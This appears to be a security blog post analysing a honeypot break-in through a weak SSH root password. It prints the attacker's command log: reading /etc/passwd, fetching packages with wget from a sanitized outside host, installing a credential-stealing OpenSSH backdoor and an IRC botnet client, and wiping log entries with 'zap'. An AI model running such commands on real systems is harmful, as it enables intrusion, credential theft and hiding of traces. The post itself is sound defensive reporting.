We will start the series with an example on weak SSH credential exploitation. We put up a Linux server that was on purpose set up so that remote root login was allowed. The root password was also set to something that was likely to get hit by SSH scanners most of the time.
We had to wait for a few hours for an attacker to arrive into the system. Below is a log of the commands he issued. We sanitized a few IP addresses and URLs for safety reasons.
w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget <poistettu>.com/i[BS]sirsky/bkd
tar xzvf bkd
cd ./–/
./inst
ls
mv zap /bin
cd ..
rm -rf bkd
rm -rf ./–/
ls
w
zap <ip.ip.ip.ip>.d
w
ls
ls
cat /etc/hosts
w
ls
ls -a
wget <poistettu>.com/sirsky/code.tgz
tar xzvf code.jpg
[U-ARROW][BS][BS][BS]tgz
cd .n
./start da[BS][BS]adware
cd ..
rm -rf code.tgz
w
Judging by the typoes in some of the commands there was a real user at the other end rather than an automated program. Also take note of the constant checking of ‘w’-command (who, shows all logged in users). We quess that had the attacker spotted someone else logged in the system they would have aborted the attack.
After first entering the system the attacker checked the list of users configured into the system from the /etc/passwd after which they dug up processor information from /proc/cpuinfo. Next, the attacker downloaded a file called ‘bkd’ from an external URL. More on that file below.
After the attacker installed the ‘bkd’ package he deleted the sourcecodes. In addition, he used a binary called ‘zap’ to delete all logentries that had the IP he used in them.
Next, he checked the /etc/hosts file apparently in an attempt to see whether it would have revealed any other computers in the LAN that he could have attacked using the honeypot as a jumpgate.
Next, he downloaded an another package from the same site, this time the file was called code.tgz, and we will get to the contents later on. Again, after installation and activation the attacker removed all source codes from the system. At this point we decided to pull the plug on the attack and disconnected the machine to wait for further examination.
Now to the downloaded packages. The package that the intruder downloaded first, ‘bkd’, is a backdoored version of openSSH. The attacker had modified and added some code routines so that every time an user logs on to the compromised system their username, password and IP address is sent to the attacker via email. This allows the attacker to further compromise other systems. Furthermore, the backdoor in the downloaded openSSH allows the attacker to gain root access even if the root password is changed.
The other package that was downloaded and installed was a slightly modified copy of an IRC bot known as EnergyMech. With it the attacker can easily execute commands remotely in the compromised system without having to log onto the machine. The bot was set up to join a specific channel in a public IRC network, and when visited we spotted around 12 compromised machines in the botnet-to-be. We issued abuse mails to proper ISPs to get them cleaned.
We also managed to backtrack the attacker to a certain town in Romania. We also found other kinds of data that helped locate the name of the attacker as well as other data and all of it will be sent to Romanian law enforcement. Unfortunately not all attacks are as easily backtracked as this was.
We intend to write more entries to the Intruders category and we aim to display a variety of attacks similar to the above.